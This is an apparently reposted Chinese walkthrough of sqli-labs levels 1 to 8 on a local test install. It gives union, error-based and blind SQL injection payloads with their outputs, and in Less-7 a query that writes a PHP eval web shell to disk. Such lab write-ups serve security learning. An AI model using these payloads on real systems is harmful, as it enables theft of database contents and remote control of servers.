sqli-libs

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-libs相关的知识,希望对你有一定的参考价值。

这是抄袭你们  铃兰师姐总结的,尽管她很不情愿。

(现在只是第八关,相信她会努力的,一定会做完,我也会随时在这个上面更新的,这个是在本地搭建的,想要这个的可以找你们铃兰师姐要啊!!!)

less-1:

1、获取当前数据库名

http://127.0.0.1/sqli-labs/Less-1/?id=‘ union select 1,2,(select database())--+

 

SELECT * FROM users WHERE id=‘‘ union select 1,2,(select database())-- ‘ LIMIT 0,1

Your Login name:2

Your Password:security

 

当前数据库名:security

 

2、获取所有数据库名

?id=‘ union select 1,2,(select group_concat(schema_name)from information_schema.schemata)--+

SELECT * FROM users WHERE id=‘‘ union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- ‘ LIMIT 0,1

Your Login name:2

Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

 

所有数据库名:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

 

3、获取表名

http://127.0.0.1/sqli-labs/Less-1/?id=‘ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)--+

//0x7365637572697479  为数据库名(security)的16进制形式

 

SELECT * FROM users WHERE id=‘‘ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479)-- ‘ LIMIT 0,1

Your Login name:2

Your Password:emails,referers,uagents,users

 

数据库security中的表名:emails,referers,uagents,users

 

4、获取列名

http://127.0.0.1/sqli-labs/Less-1/?id=‘ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema = 0x7365637572697479 and table_name=0x7573657273)--+

 

//0x7573657273 表名:users

SELECT * FROM users WHERE id=‘‘ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =0x7365637572697479 and table_name=0x7573657273)-- ‘ LIMIT 0,1

Your Login name:2

Your Password:id,username,password

 

列名:id,username,password

 

5、获取数据

http://127.0.0.1/sqli-labs/Less-1/?id=‘ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

 

//0X7c:空格

SELECT * FROM users WHERE id=‘‘ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- ‘ LIMIT 0,1

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|[email protected],4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

 

数据:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|[email protected],4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

 

6、读取数据库路径/获取安装路径

http://localhost/sqli-labs-master/less-1/?id=0‘ union select 1,@@datadir,@@basedir--+

 

Your Login name:D:\wamp\bin\mysql\mysql5.6.12\data\

Your Password:D:/wamp/bin/mysql/mysql5.6.12

 

数据库路径:D:\wamp\bin\mysql\mysql5.6.12\data\

mysql安装路径:D:/wamp/bin/mysql/mysql5.6.12

 

 

 

 

 

 

 

Less-2:

1、获取列数:

http://localhost/sqli-labs-master/less-2/?id=1 order by 1,2,3,4--+

 

SELECT * FROM users WHERE id=1 order by 1,2,3,4-- LIMIT 0,1

Unknown column ‘4‘ in ‘order clause‘

(共有三列)

 

2、获取数据库名称:

 http://localhost/sqli-labs-master/less-2/?id=‘ ‘ union select  1,2,(select database())--+

 ("id="后面为两个单引号)

 

SELECT * FROM users WHERE id=‘ ‘ union select 1,2,(select database())-- LIMIT 0,1

Your Login name:2

Your Password:security

 

数据库:security

 

3、获取所有数据库名称:

http://localhost/sqli-labs-master/less-2/?id=‘ ‘

 

SELECT * FROM users WHERE id=‘ ‘ union select 1,2,(select group_concat(schema_name)from information_schema.schemata)-- LIMIT 0,1

Your Login name:2 Your Password:information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

 

所有数据库名称:

information_schema,challenges,info,mysql,news,performance_schema,register,security,text,yuan

 

4、获取表名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

 

SELECT * FROM users WHERE id=‘ ‘ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479)-- LIMIT 0,1

 

Your Login name:2

Your Password:emails,referers,uagents,users

 

0x7365637572697479(security)中的表有:emails,referers,uagents,users

 

5、获取列名称:

http://localhost/sqli-labs-master/less-2/?id=%27%20%27%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

 

SELECT * FROM users WHERE id=‘ ‘ union select 1,2,(select group_concat(column_name)from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273)-- LIMIT 0,1

 

Your Login name:2

Your Password:id,username,password

 

数据库security中表users的列名称:id,username,password

 

6、获取表中数据:

http://localhost/sqli-labs-master/less-2/?id=‘ ‘ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)--+

 

SELECT * FROM users WHERE id=‘ ‘ union select 1,2,(select group_concat(id,0x7c,username,0x7c,password) from security.users)-- LIMIT 0,1

 

Your Login name:2

Your Password:1|Dumb|Dumb,2|Angelina|I-kill-you,3|Dummy|[email protected],4|secure|crappy,5|stupid|stupidity,6|superman|genious,7|batman|mob!le,8|admin|admin,9|admin1|admin1,10|admin2|admin2,11|admin3|admin3,12|dhakkan|dumbo,14|admin4|admin4

 

 

 

 

 

 

 

 

Less-3

1.获取列数:

http://localhost/sqli-labs-master/less-3/?id=1‘) order by 1,2,3,4--+

 

SELECT * FROM users WHERE id=(‘1‘) order by 1,2,3,4-- ‘) LIMIT 0,1

Unknown column ‘4‘ in ‘order clause‘

 

[email protected]@datadir 读取数据库路径;@@basedir  获取mysql安装路径

http://localhost/sqli-labs-master/less-3/?id=0%27)%20union%20select%201,@@datadir,@@basedir--+

 

之后方法类似less-1less-2!!!

 

 

 

 

 

 

 

 

Less-4

1、获取列数:

http://localhost/sqli-labs-master/less-4/?id=1") order by 1,2,3,4--+

 

SELECT * FROM users WHERE id=("1") order by 1,2,3,4-- ") LIMIT 0,1

Unknown column ‘4‘ in ‘order clause‘

2、获取数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%20%201,2,(select%20database())--+

3、所有数据库名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(schema_name)from%20information_schema.schemata)--+

4、获取表名称:

http://localhost/sqli-labs-master/less-4/?id=%22)union%20select%201,2,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema%20=%200x7365637572697479)--+

5、获取列名:

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273)--+

6、获取数据

http://localhost/sqli-labs-master/less-4/?id=%22)%20union%20select%201,2,(select%20group_concat(id,0x7c,username,0x7c,password)%20from%20security.users)--+

 

 

 

 

 

 

 

 

Less-5(二分法)

1.获取列数:

http://localhost/sqli-labs-master/less-5/?id=‘ order by 4--+

共四列: Unknown column ‘4‘ in ‘order clause‘

2、报错得到数据库的个数:

http://localhost/sqli-labs-master/less-5/?id=1‘+and(select 1 from (select count(*),concat((select(select(select concat(0x7e7e3a7e7e,count(distinct table_schema),0x7e7e3a7e7e) from information_schema.tables)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

 

Duplicate entry ‘~~:~~11~~:~~1‘ for key ‘group_key‘

==>>共十一个数据库

 

2.报错得到数据库名:

http://localhost/sqli-labs-master/less-5/

?id=1‘ and (select 1 from (select count(*),concat((select (select (select distinct concat(0x7e7e3a7e7e,table_schema,0x7e7e3a7e7e) from information_schema.tables limit 8,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)--+

 

Duplicate entry ‘~~:~~security~~:~~1‘ for key ‘group_key‘

==>第九个数据库名为 security

 

3.报错得到表名:

首先得到表的个数:

/less-5/?id=1‘ and (select 1 from (select count(*),concat((select (select(select concat(0x7e7e3a7e7e,count(table_name),0x7e7e3a7e7e)from information_schema.tables where table_schema=0x7365637572697479))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

==>Duplicate entry ‘~~:~~4~~:~~1‘ for key ‘group_key‘

共有四个表

依次得到表的名字:

?id=1‘ and (select 1 from (select count(*),concat((select(select(select concat (0x7e7e3a7e7e,table_name,0x7e7e3a7e7e)from information_schema.tables  where table_schema=0x7365637572697479 limit 3,1)) from information_schema.tables limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

Duplicate entry ‘~~:~~users~~:~~1‘ for key ‘group_key‘

 

2.获取数据库版本号:

http://localhost/sqli-labs-master/less-5/?id=1‘ and left(version(),1)=5--+

left(string,n)函数:提取字符串string左边的n个字符。

3.利用length()获取数据库长度:

http://localhost/sqli-labs-master/less-5/?id=1‘ and length(database())=8 --+

数据名长度为8

4.奇怪:

http://localhost/sqli-labs-master/less-5/?id=1‘ and length(db())=8 --+

 

结果:FUNCTION security.db does not exist

 

5.获取数据库名字:使用二分法获取其各个字母

http://localhost/sqli-labs-master/less-5/?id=1‘ and left(database(),1) >‘s‘--+

第一个字母为s;

 

http://localhost/sqli-labs-master/less-5/?id=1%27%20and%20left(database(),2)%20%3E%27se%27--+

前两个字母为se;

依次类推。。。

 

6.获取数据库security 数据库的第一表的第一个字符:

 

首先得出数据库的第一个表的长度:

http://localhost/sqli-labs-master//Less-5/?id=1‘ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+

长度为6

 

/Less-5/?id=1‘ and ascii(substr((select table_name from information_schema.tables  where table_schema=database() limit 0,1),1,1))>101--+

/Less-5/?id=1‘ and ascii(substr((select table_name from information_schema.tables  where table_schema=‘security‘ limit 0,1),1,1))>101--+

第一个字母为e;

 

/Less-5/?id=1‘ and length(select table_name from information_schema.tables where table_schema =database() limit 0,1)>10--+

 

 

 

 

 

 

 

 

 

Less-7

1.创建一个木马文件7.php,连接菜刀(必须知道数据库的用户名和密码),然后管理数据库即可得到数据库内容

http://localhost/sqli-labs-master/less-7/?id=0%27))%20union%20select%201,2,%27%3C?php%[email protected]($_POST[%27mima%27]);%20?%3E%27%20into%20outfile%20%27D://Demo//sqli-labs-master/less-7/7.php%27--+

 

 

 

 

 

 

 

 

less-8:

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将strpos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

 ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii

if(a,b,c) :a为条件,atrue,返回b,否则返回c,如if(1>2,1,0),返回0

 

首先要记得常见的ASCIIA:65,Z:90 a:97,z:122,  0:48, 9:57

 

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii

ascii(substr((select database()),1,1))>64ascii大于64就返回trueif就返回1,否则返回0

 

 

 

 

 

 

ps:(你们铃兰师姐会持续更新的)

以上是关于sqli-libs的主要内容,如果未能解决你的问题,请参考以下文章